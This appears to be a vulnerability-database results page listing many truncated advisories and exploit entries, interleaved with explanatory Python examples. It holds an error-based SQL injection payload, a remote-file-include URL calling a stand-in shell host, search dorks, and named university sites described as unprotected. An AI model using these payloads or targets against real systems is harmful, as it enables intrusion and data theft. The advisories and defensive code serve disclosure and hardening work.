56796 matches found
XStream Remote Code Execution Vulnerability (CVE-2021-29505)
CVE-2021-29505 Vulnerability CVE-2021-29505: XStream is vulnerable to a Remote Command Execution attack. Affected Versions All versions until and including version 1.4.16 are affected, if using the version out of the box. No user is affected, who followed the recommendation to setup XStream's...
Broadcom: Heap overflow in "wl_run_escan" when handling WLC_GET_VALID_CHANNELS ioctl results(CVE-2017-0568)
Broadcom produces Wi-Fi HardMAC SoCs which are used to handle the PHY and MAC layer processing. These chips are present in both mobile devices and Wi-Fi routers, and are capable of handling many Wi-Fi related events without delegating to the host OS. On Android devices, the "bcmdhd" driver is use...
phpshe v1.1 Arbitrary File Upload Vulnerability
No description provided by source...
PHPizabi 0.848b C1 HFP1 Remote Code Execution Exploit
No description provided by source. #!/usr/bin/perl inphex PHPizabi v0.848b C1 HFP1 Remote Code Execution http://www.dz-secure.com/tools/1/WebESploit.pl.txt If you are seeking a partner to work on some projects, just send an email to inphex0 at gmail dot com system/vcronproc.php if...
XOOPS Module Repository ViewCat.PHP SQL Injection Vulnerability
XOOPS Module Repository is a PHP-based web application. XOOPS Module Repository does not properly filter user-submitted input; a remote attacker can exploit this to perform SQL injection and obtain sensitive information. The problem is that the 'ViewCat.PHP' script does not filter the user-supplied 'cid' parameter; submitting malicious SQL code as the parameter value can alter the original SQL logic and disclose sensitive information. Xoops Module Repository: no solution is currently available: http://www.xoops.org/modules/repository/ http://www.sebug.net/show-exp-1622.html...
Bingo News BP_ncom.PHP Remote File Inclusion Vulnerability
BinGoPHP is a PHP-based web application. BinGoPHP does not properly filter user-submitted URI data; a remote attacker can exploit this to execute arbitrary commands with the privileges of the web server process. The problem is that the 'BP_ncom.PHP' script does not filter the user-supplied 'bnrep' parameter; supplying a malicious remote server as the include target can lead to execution of arbitrary PHP code with web server privileges. BinGoPHP BinGoPHP 3.01 http://bingophp.free.fr/ http://www.example.com/Script Path/bp_ncom.php?bnrep=http://SHELLURL.COM?...
Linux ext4: out-of-bounds memcpy via non-inline system.data xattr(CVE-2018-11412)
ext4 can store data for small regular files as "inline data", meaning that the data is stored inside the corresponding inode instead of in separate blocks. Inline data is stored in two places: The first 60 bytes go in the iblock field in the inode which normally contains a list of blocks instead,...
Apache Tomcat Information Disclosure Vulnerability (CVE-2016-6816)
Severity: Important Vendor: The Apache Software Foundation Versions Affected: Apache Tomcat 9.0.0.M1 to 9.0.0.M11 Apache Tomcat 8.5.0 to 8.5.6 Apache Tomcat 8.0.0.RC1 to 8.0.38 Apache Tomcat 7.0.0 to 7.0.72 Apache Tomcat 6.0.0 to 6.0.47 Earlier, unsupported versions may also be affected...
ecshop delete_cart_goods.php SQL Injection Vulnerability
0x01 Framework introduction: DaMall multi-purpose mall site-building system, supporting B2C2C and O2O modes... DaMall is developed on the .NET enterprise platform and accommodates the business characteristics and extension needs of multiple industries and business models. Official homepage: http://www.bg68.com 0x02 Vulnerability details. Vulnerable page: http://mall.bg68.com/httphandler/getdata.ashx, parameter brandid. Some customer sites: http://mall.hicay.com/httphandler/getdata.ashx http://w16.cxecs.com/httphandler/getdata.ash...
Espcms v5.0 /index.php SQL Injection Vulnerability
Construct: www.xxx.cc/index.php?ac=search&at=taglist&tagkey=%2527,tags) or (select 1 from (select count(*),concat((select concat(0x7e,0x27,table_name,0x27,0x7e) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23...
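The `%2527` at the start of the payload above is a double-encoded single quote: one round of percent-decoding yields `%27`, which contains no quote for a filter to catch, and a second round yields `'`. The following is an added example, not Espcms code, that reproduces this double-decoding failure against a constructed SQLite table and shows the fix: decode to a fixed point before validating, and bind the value as a query parameter so it can never change the statement. The table, the `waf_blocks` stand-in filter and the column names are assumptions for illustration.

```python
import sqlite3
from urllib.parse import unquote

def make_db():
    """Constructed sample table; not the Espcms schema."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tags (name TEXT, tagkey TEXT)")
    conn.executemany("INSERT INTO tags VALUES (?, ?)",
                     [("news", "news"), ("internal-only", "secret")])
    return conn

def waf_blocks(value):
    """Stand-in for a filter that rejects a single quote in the parameter."""
    return "'" in value

def fully_decode(value, max_rounds=5):
    """Percent-decode until the value stops changing, so validation sees the final form."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    raise ValueError("too many layers of percent-encoding")

def vulnerable_search(conn, raw_tagkey):
    once = unquote(raw_tagkey)          # first decode (e.g. by the web server): %2527 -> %27
    if waf_blocks(once):                # the filter runs here and sees no quote
        return []
    tagkey = unquote(once)              # the application decodes again: %27 -> '
    sql = "SELECT name FROM tags WHERE tagkey = '%s'" % tagkey   # string-built query
    return [row[0] for row in conn.execute(sql)]

def hardened_search(conn, raw_tagkey):
    tagkey = fully_decode(raw_tagkey)   # normalise first, then validate and use
    # Parameterised statement: the value can never alter the query structure,
    # so the quote filter becomes defence in depth rather than the only control.
    return [row[0] for row in conn.execute(
        "SELECT name FROM tags WHERE tagkey = ?", (tagkey,))]

# Double-encoded injection: one decode gives  news%27 OR %271%27=%271  (passes the filter),
# a second decode gives  news' OR '1'='1
INJECTED = "news%2527%20OR%20%25271%2527%3D%25271"
```

Running `vulnerable_search(make_db(), INJECTED)` returns every row, including the one the caller should never see, while `hardened_search` with the same input returns nothing.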
CUPS Filter Bash Environment Variable Code Injection
No description provided by source. This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class Metasploit4 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient def initialize(inf...
AlstraSoft AskMe Pro <= 2.1 - Multiple SQL Injection Vulnerabilities
No description provided by source. -+================================================================================+- -+ AlstraSoft AskMe Pro <= 2.1 SQL Injection Vulnerabilities +- -+================================================================================+- Discovered By: t0pP8uZz...
Coremail Arbitrary File Read Vulnerability
Brief description: Coremail has an implementation flaw. Using the XML parsing vulnerability published by 80sec, arbitrary files on the server can be read, including server configuration files and sensitive database files; combined with application logic, higher privileges may be obtainable. All Coremail users are affected. Details: The Coremail service accepts and passes parameters in XML format. According to 80sec's security advisory, incorrectly handled XML data on the server side leads to a vulnerability that allows reading arbitrary file contents with the application's privileges, and combined with application logic more privileges may be obtained. Proof: the magic code: simply append our malicious code to the XML header. POST...
Mambo User Home Pages Component <= 0.5 Remote Include Vulnerability
No description provided by source. Kurdish Security Freedom For Ocalan Contact : irc.gigachat.net kurdhack & www.PatrioticHackers.com Risk : High Class : Remote Script : User Home Pages Site : www.ravensportal.co.uk Thanx : kurdishsniper,netqurd,flot,azad,darki,B3g0k,jubni,milex,fearless,kha,kca a...
Tomcat Information Disclosure Vulnerability (CVE-2017-12616) Analysis
Several recent Tomcat CVEs: CVE-2017-5664 Tomcat security constraint bypass; CVE-2017-12615 remote code execution vulnerability; CVE-2017-12616 information disclosure vulnerability. What they have in common is that all of them relate to the JspServlet and DefaultServlet. CVE-2017-12615, the remote code execution vulnerability...
PHPCMS v9 wap module SQL injection
Suspicious function: 1. In localhost/phpcms/modules/attachment/attachments.php, at line 241 the src variable submitted via GET is passed through the safe_replace function; now let's go into this filter function and see what it does. 2. The filter function's profile and bypass...
NS-ASG Application Security Gateway: SQL Injection Vulnerabilities in resetpwd.php and 9 Other Locations
No description provided by source...
Binary File Descriptor Library (libbfd) - Out-of-Bounds Crash
No description provided by source. Many shell users, and certainly a lot of the people working in computer forensics or other fields of information security, have a habit of running /usr/bin/strings on binary files originating from the Internet. Their understanding is that the tool simply scans t...
Joomla Component com_facileforms 1.4.4 RFI Vulnerability
No description provided by source. Title: Joomla Component Com_Facileforms ================================================================ + Author : Dr.Kacak + Special Thankz : KnocKout and all my friends + System 0VerfL0verZ ================================================================= Scri...
pigcms id Parameter SQL Injection Vulnerability
No description provided by source...
WebSphere "Java Deserialization" Remote Command Execution Vulnerability
Environment configuration required for this vulnerability: the root cause is commons-collections.jar; the SOAP port 8880 enabled (/opt/IBM/WebSphere/AppServer/properties/wsadmin.properties). Tested WebSphere version: 7.0.0.11; the latest version at present is 8.5.5. Vulnerability impact: the ZoomEye team verified the vulnerability against 2.896 million servers worldwide with port 8880 open and confirmed that 963 of them are at risk. Related vulnerability links: 1. JBoss "Java deserialization" remote command execution vulnerability https://www.sebug.net/vuldb/ssvid-89723 2...
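The entry above identifies the ingredients (commons-collections on the classpath, a SOAP listener on 8880) but not what such a request looks like on the wire. The following is an added detection example, not code from IBM, ZoomEye or the advisory: it scans a SOAP request body for a Java serialized object, either raw (stream magic `AC ED 00 05`) or base64-encoded (which always begins `rO0AB`), pulls class names out of TC_CLASSDESC records, and flags the commons-collections transformer classes that gadget chains use. The SOAP envelope and the serialized stream are constructed for the example and are only a header, not a working gadget payload; the element names and the class list are assumptions.

```python
import base64
import re

JAVA_SER_MAGIC = b"\xac\xed\x00\x05"     # STREAM_MAGIC + STREAM_VERSION 5
# base64 of a serialized stream always starts with "rO0AB"; grab the rest of the blob after it
B64_BLOB_RE = re.compile(rb"rO0AB[A-Za-z0-9+/]{8,}={0,2}")
# TC_CLASSDESC (0x72) followed by a u2 class-name length; only names shorter than 256 bytes are handled
CLASSDESC_RE = re.compile(rb"\x72\x00([\x01-\xff])([A-Za-z0-9_.$]+)")
SUSPICIOUS_CLASSES = {
    "org.apache.commons.collections.functors.InvokerTransformer",
    "org.apache.commons.collections.functors.ChainedTransformer",
}

def class_names(stream):
    """Class names from TC_CLASSDESC records of a serialized stream."""
    names = []
    for m in CLASSDESC_RE.finditer(stream):
        length = m.group(1)[0]
        if len(m.group(2)) >= length:
            names.append(m.group(2)[:length].decode("ascii"))
    return names

def scan_soap_body(body):
    """Find serialized Java objects in a request body, raw or base64-encoded inside XML."""
    blobs = []
    if JAVA_SER_MAGIC in body:                       # object sent as raw bytes
        blobs.append(body[body.index(JAVA_SER_MAGIC):])
    for m in B64_BLOB_RE.finditer(body):             # object base64-encoded in an element
        text = m.group(0)
        text = text[: len(text) - len(text) % 4]     # drop a partial final quantum
        try:
            blob = base64.b64decode(text)
        except ValueError:
            continue
        if blob.startswith(JAVA_SER_MAGIC):
            blobs.append(blob)
    classes = sorted({name for blob in blobs for name in class_names(blob)})
    return {
        "serialized_objects": len(blobs),
        "classes": classes,
        "suspicious": [c for c in classes if c in SUSPICIOUS_CLASSES],
    }

def constructed_stream(class_name):
    """Constructed stream header only: magic, version, TC_OBJECT, TC_CLASSDESC, u2 length, name."""
    name = class_name.encode("ascii")
    return JAVA_SER_MAGIC + b"\x73\x72" + len(name).to_bytes(2, "big") + name

# Constructed SOAP envelope carrying the object base64-encoded; not a real WebSphere message.
SAMPLE_BODY = (
    b'<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Body>'
    b"<ns1:invoke><ns1:arg>"
    + base64.b64encode(constructed_stream(
        "org.apache.commons.collections.functors.InvokerTransformer"))
    + b"</ns1:arg></ns1:invoke></soapenv:Body></soapenv:Envelope>"
)
```

A serialized object in a management request is not proof of exploitation on its own, but a transformer class from commons-collections in a stream arriving on the SOAP port is something a SOC should alert on and pair with the server's own deserialization filtering.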
Discuz X3.2 Front-end GET SQL Injection Vulnerability (Bypassing the Global WAF)
/source/include/misc/misc_stat.php line 46: if(!empty($_GET['xml'])) { $xaxis = ''; $graph = array(); $count = 1; $begin = dgmdate($beginunixstr, 'Ymd'); $end = dgmdate($endunixstr, 'Ymd'); $field = ''; if(!empty($_GET['merge'])) { if(empty($_GET['types'])) { $_GET['types'] = array_merge($cols['login'], $cols['forum'], $cols['tgroup'],...
Python socket.recvfrom_into() - Remote Buffer Overflow
No description provided by source. #!/usr/bin/env python ''' Exploit Title: python socket.recvfrom_into remote buffer overflow Date: 21/02/2014 Exploit Author: @sha0coder Vendor Homepage: python.org Version: python2.7 and python3 Tested on: linux 32bit + python2.7 CVE : CVE-2014-1912...
Zhengfang Educational Administration System XSS Vulnerability Threatening All Logged-in Users
Brief description: All users who log in to the Zhengfang educational administration system may be affected by this vulnerability. Details: After logging in, each user's home page is the notice board. Teachers have permission to modify or add notices on the board, and there is an XSS vulnerability here. Proof: Log in with any teacher account (how to get one? figure it out yourself, but evidently quite a few teachers still use the default password without changing it). Click Public Information, then Academic Notices: here the notice title can be anything, so let's try a pop-up: this successfully adds a notice, visible to all users of the whole school by default. You can also choose the audience for the message (all users of a college, or a single teacher), enabling a targeted XSS strike. Switch to another user and log in, and you will see the following prompt:...
Organic Technologies CMS productos.php parameter id SQL injection vulnerability
No description provided by source...
DaMi CMS V5.53 Directory Traversal
No description provided by source...
Yonyou Zhiyuan A6 Collaboration System /yyoa/HJ/iSignatureHtmlServer.jsp SQL Injection Vulnerability
No description provided by source...
SiteServer CMS /livefiles/pages/inner/userlist.aspx SQL Injection
No description provided by source...
libreport Information Disclosure Vulnerability
No description provided by source...
Ingo Procmail Driver Shell Command Execution Vulnerability
Ingo is an email filter rule manager integrated into the Horde and IMP webmail clients. Ingo's procmail driver does not properly escape folder names; a remote attacker may exploit this to execute arbitrary shell commands. Horde Ingo 1.1.1 The vendor has released an upgrade patch fixing this issue; please download it from the vendor's homepage: ftp://ftp.horde.org/pub/ingo/ingo-h3-1.1.2.tar.gz http://ftp.horde.org/pub/ingo/ingo-h3-1.1.2.tar.gz...
PhotoPost <= 4.6 (PP_PATH) Remote File Include Vulnerability
No description provided by source. ==================================================================== PhotoPost <= 4.6 PP_PATH Remote File Inclusion Exploit ==================================================================== Critical Level : Dangerous By Saudi Hackrz http://www.popphoto.com/...
Weaver OA /webservice/upload.php, /webservice/upload/upload.php and Other Locations: Arbitrary File Upload
Four arbitrary file upload points, all the same vulnerability. File locations: /webservice/upload.php /webservice/upload/upload.php /webservice-json/upload/upload.php /webservice-xml/upload/upload.php All four contain the following code, with no validation of the file at all and no login required. The uploaded file lands at: $path = $ATTACHPATH.$attachmentID; $fileName = $path."/".$_FILES['file']['name']; move_uploaded_file($_FILES['file']['tmp_name']...
IIS Http.sys Range Handling Integer Overflow Vulnerability
1. Vulnerability summary: On April 14, 2015, Microsoft published the critical security bulletin MS15-034, CVE-2015-1635, stating that a vulnerability in Http.sys could allow remote code execution. Vulnerability description: Http.sys is a core component of the Windows operating system that lets any application communicate over HTTP through the interface it provides. Microsoft introduced the new HTTP API and the kernel-mode driver Http.sys in Windows Server 2003 to make HTTP-based services more efficient. In fact, after SP2 is installed on Windows XP, Http.sys...
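The following added example (not Http.sys code, which the entry does not reproduce) shows the arithmetic the entry's title refers to: with 64-bit integers, a Range header whose last byte position is 2^64-1 makes `last - first + 1` wrap to zero, so a length check passes a range that is actually enormous. The checked parser rejects the same header before any length is used. The header value `bytes=0-18446744073709551615` is the one sent by the published MS15-034 checks; the content length and the clamping rule are assumptions for illustration.

```python
import re

U64_MAX = (1 << 64) - 1
RANGE_RE = re.compile(r"^bytes=(\d+)-(\d+)$")

# 18446744073709551615 is 2**64 - 1; the public MS15-034 probe sends exactly this range.
PROBE_HEADER = "bytes=0-18446744073709551615"

def range_length_unchecked(header):
    """Length computed as naive 64-bit C code would: last - first + 1, wrapping silently."""
    m = RANGE_RE.match(header.strip())
    if not m:
        return None
    first, last = int(m.group(1)), int(m.group(2))
    return (last - first + 1) & U64_MAX      # 2**64 wraps to 0

def range_length_checked(header, content_length):
    """Validate the range against 64-bit limits and the resource size before using it."""
    m = RANGE_RE.match(header.strip())
    if not m:
        raise ValueError("unsupported Range syntax")
    first, last = int(m.group(1)), int(m.group(2))
    if last > U64_MAX or first > last:
        raise ValueError("invalid byte range")
    if last - first + 1 > U64_MAX:
        raise ValueError("range length overflows 64 bits")
    if first >= content_length:
        raise ValueError("range not satisfiable")
    last = min(last, content_length - 1)      # RFC 7233: clamp last-byte-pos to the resource
    return last - first + 1
```

`range_length_unchecked(PROBE_HEADER)` returns 0, which is the value a naive bounds check would happily accept; `range_length_checked` raises on the same input and only returns a length for ranges that fit both the integer width and the resource.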
PerlSoft Gästebuch Version: 1.7b 'admincenter.cgi' Remote Command Execution Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/33525/info PerlSoft Gästebuch is prone to a vulnerability that attackers can leverage to execute arbitrary commands. This issue occurs because the application fails to adequately sanitize user-supplied input. Note that a...
JBoss, JMX Console, misconfigured DeploymentScanner
No description provided by source. #!/usr/bin/perl Exploit Title: JBoss, JMX Console, misconfigured DeploymentScanner Date: Oct 3 2011 Author: y0ug at codsec.com Version: Tested on: Linux CVE : CVE-2010-0738 POC against misconfigured JBoss JMX Console It uses the addUrl method in DeploymentScanner...
Joomla Template BizWeb com_community Persistent XSS Vulnerability
No description provided by source. I'm Sid3^effects, member of Inj3ct0r Team. Name : Joomla com_community Persistent XSS Vulnerability Date : June 21, 2010 Critical Level : HIGH Vendor Url : http://styleware.eu/...
Microsoft IIS Alternate Data Stream Authentication Bypass Vulnerability (MS10-065)
BUGTRAQ ID: 41314 CVE ID: CVE-2010-2731 Microsoft Internet Information Services (IIS) is a network information server bundled with Microsoft Windows that includes HTTP service functionality. IIS does not correctly handle basic authentication for directories; a remote attacker can append an NTFS stream name and stream type (:$i30:$INDEX_ALLOCATION) to the requested directory name to bypass authentication and access a protected directory. Microsoft IIS 5.1 Vendor patch: Microsoft --------- Microsoft has released a security bulletin (MS10-065) and the corresponding patch:...
Resin 3.1.1 Cross-Site Scripting Vulnerability
No description provided by source...
NewsReactor 20070220 Article Grabbing Remote BoF Exploit (1)
No description provided by source. /* NewsReactor 20070220 Article Grabbing Remote Buffer Overflow Exploit (1)...
Founder Thesis Authorization Submission System: Back-end Admin Login SQL Injection / Filter Bypass / Database Dump / Web Shell Risk
Brief description: I happened to notice an obvious vulnerability in the thesis submission system on my alma mater's website; a quick search showed that this system is widely deployed and affects many universities. All degree theses can be downloaded at will, so students' years of hard work can easily be taken. Someone already reported this on WooYun last October, but many schools still have no protective filtering, and those that added filtering can be bypassed easily; once bypassed, the file upload vulnerability allows planting a web shell directly. Details: Verified affected schools: Yunnan University (unprotected) http://202.203.222.222/tasi/admin.asp?lang=gb South China Normal University Zengcheng College (unprotected) http://lib2.scnuzc.cn/tasi/admin/login.asp...
phpCodeGenie <= 3.0.2 (BEAUT_PATH) Remote File Include Vulnerability
No description provided by source. /* + + - - - DEVIL TEAM THE BEST POLISH TEAM - - + + + - phpCodeGenie <= 3.0.2 BEAUT_PATH Remote File Include Vulnerability + + + - Script name: phpCodeGenie v. 3.0.2 - Script site: http://sourceforge.net/projects/phpcodegenie/ + + + - Found by: Kacper a.k.a Rahim +...
Apache Tomcat Denial of Service Vulnerability (CVE-2012-5568)
Bugtraq ID:56686 CVE ID:CVE-2012-5568 Apache Tomcat is an open-source JSP application server. Apache Tomcat has a vulnerability: an attacker who slowly and continuously sends one header field after another can cause the server to consume system resources such as threads, resulting in a denial of service. The Slowloris denial-of-service tool can trigger this vulnerability. Apache Software Foundation Tomcat 7.0.x Apache Software Foundation Tomcat 6.0.x Apache Software Foundation Tomcat 5.x Apache...
Tinyproxy 'conf.c' Integer Overflow Security Bypass Vulnerability
Bugtraq ID: 47715 CVE ID:CVE-2011-1499 Tinyproxy is a small GPL-licensed HTTP/SSL proxy. Tinyproxy has an error in its subnet mask generation: when a network segment is allowed, such as "Allow 192.168.0.0/24" instead of the default "Allow 127.0.0.1", arbitrary IP addresses are allowed to connect, turning it into an open proxy. This happens whenever the configuration uses one or more Allow statements with IP ranges. Banu Systems Private Limited Tinyproxy 1.8.2 Vendor solution: Tinyproxy 1.8.3 fixes this vulnerability; users are advised to download and use it...
MySQL COM_FIELD_LIST Command Privilege Check Bypass Vulnerability
BUGTRAQ ID: 40109 CVE ID: CVE-2010-1848 MySQL is a very widely used open-source relational database system with versions for many platforms. MySQL does not correctly perform privilege checks on the table name argument when handling the COM_FIELD_LIST command; an authenticated user with DELETE or SELECT privilege on one table can read or delete the contents of other tables. MySQL 5.1/5.0 Vendor patch: Oracle ------ The vendor has released an upgrade patch fixing this issue; please download it from the vendor's homepage: http://bugs.mysql.com/bug.php?id=53371...
eWebEditorNet upload.aspx Upload Vulnerability
eWebEditorNet's upload vulnerability is mainly in the upload.aspx file. form id="post" encType="server" "uploadfile" style="file" size="uploadfile" runat= "lbtnUpload" runat= "JavaScript" It only performs a simple check on the ID; just construct javascript:lbtnUpload.click(); to satisfy the condition and upload a web shell. After success, view the source: a "lbtnUpload" "javascript:__doPostBack('lbtnUpload','')"/script 'javascript'...
MS14-058 Windows Kernel Privilege Escalation Vulnerability (CVE-2014-4113)
No description provided by source...
SQL Injection in CmsTop Media Edition
Brief description: SQL injection vulnerability. Details: The administrator password can be modified directly. The problem is in the uc.php interface, which does not correctly check whether the UC interface is enabled, and the key is the default one. Because the code itself turns GPC off, injection results. $set = setting('member'); $set['uc_dbtablepre'] = '`'.$set['uc_dbname'].'`.'.$set['uc_dbtablepre']; $set = array_change_key_case($set, CASE_UPPER); foreach($set as $k => $v) if(preg_match('/^UC_/', $k)) define($k, $v);...
BookmarkX script 2007 (topicid) Remote SQL Injection Vulnerability
No description provided by source. BookmarkX scriptPowered by GengoliaWebStudioSQL Injection AUTHOR : S@BUN HOME : http://www.hackturkiye.com/ DorKs 1 : "2007 BookmarkX script" DORKS 2 : Powered by GengoliaWebStudio DORK 3 : allinurl :"index.php?menu=showtopic" EXPLOIT :...
CherryPy Cookie Session ID Information Disclosure Vulnerability
BUGTRAQ ID: 27181 CherryPy is an object-oriented HTTP framework written in Python. CherryPy has a vulnerability in its handling of cookie data; a remote attacker may exploit it to access arbitrary files on the system. If a user supplies a malicious session ID via a cookie and the server uses file-based sessions, the application may reference files outside the session directory (file names beginning with SESSION_PREFIX). cherrypy.org CherryPy 3.0.2 cherrypy.org CherryPy 2.1.1 cherrypy.org ------------ The vendor has released an upgrade patch fixing this issue; please download it from the vendor's homepage:...
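The Weaver OA upload entry earlier in this list (the client's `$_FILES['file']['name']` joined straight onto the attachment path) and this CherryPy entry (a cookie-supplied session ID used in a file name) are the same pattern: an attacker-controlled string becomes part of a filesystem path. The following added example, not code from either project, shows one containment helper serving both cases. The session ID is validated against a strict pattern and the resulting path is proven to lie under the session directory; the upload handler never reuses the client's name at all, keeping only an allow-listed extension. The directory names, the session ID format, the `session-` prefix and the extension allow-list are assumptions.

```python
import os
import re
import secrets

SESSION_ID_RE = re.compile(r"^[A-Za-z0-9]{16,64}$")   # assumed format: opaque alphanumeric token
ALLOWED_UPLOAD_EXT = {".png", ".jpg", ".jpeg", ".pdf"}

def is_inside(base_dir, path):
    """True if path, after lexical normalisation and symlink resolution, stays under base_dir."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(path)
    return os.path.commonpath([base, target]) == base

def contained_path(base_dir, name):
    """Join name under base_dir and refuse the result unless it stays inside base_dir."""
    target = os.path.join(os.path.realpath(base_dir), name)
    if not is_inside(base_dir, target):
        raise ValueError("path escapes %s: %r" % (base_dir, name))
    return os.path.realpath(target)

def session_file_vulnerable(session_dir, session_id, prefix="session-"):
    """The cookie value goes into the file name as-is: the shape of flaw the entry describes."""
    return os.path.join(session_dir, prefix + session_id)

def session_file_hardened(session_dir, session_id, prefix="session-"):
    if not SESSION_ID_RE.match(session_id):
        raise ValueError("malformed session id")            # rejects '/', '.', and anything odd
    return contained_path(session_dir, prefix + session_id)  # containment as a second check

def upload_target(upload_dir, client_filename):
    """Never reuse the client's name: keep an allow-listed extension and generate the rest."""
    ext = os.path.splitext(os.path.basename(client_filename))[1].lower()
    if ext not in ALLOWED_UPLOAD_EXT:
        raise ValueError("extension not allowed: %r" % ext)
    return contained_path(upload_dir, secrets.token_hex(16) + ext)
```

The pattern check alone would already stop the traversal; `contained_path` is kept as a second, independent control so that a later relaxation of the ID format (or a new caller that forgets the check) still cannot reach outside the directory.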
Aurora IDEX Membership (IDXM) ERC20 Token allows attackers to acquire contract ownership (CVE-2018-10666)
Abstract: I found a new vulnerability in the smart contract of the IDXM Token, CVE-2018-10666. Attackers can acquire contract ownership because the setOwner function is declared as public. A new owner can subsequently bypass intended access restrictions by, for example, calling uploadBalances. Details In...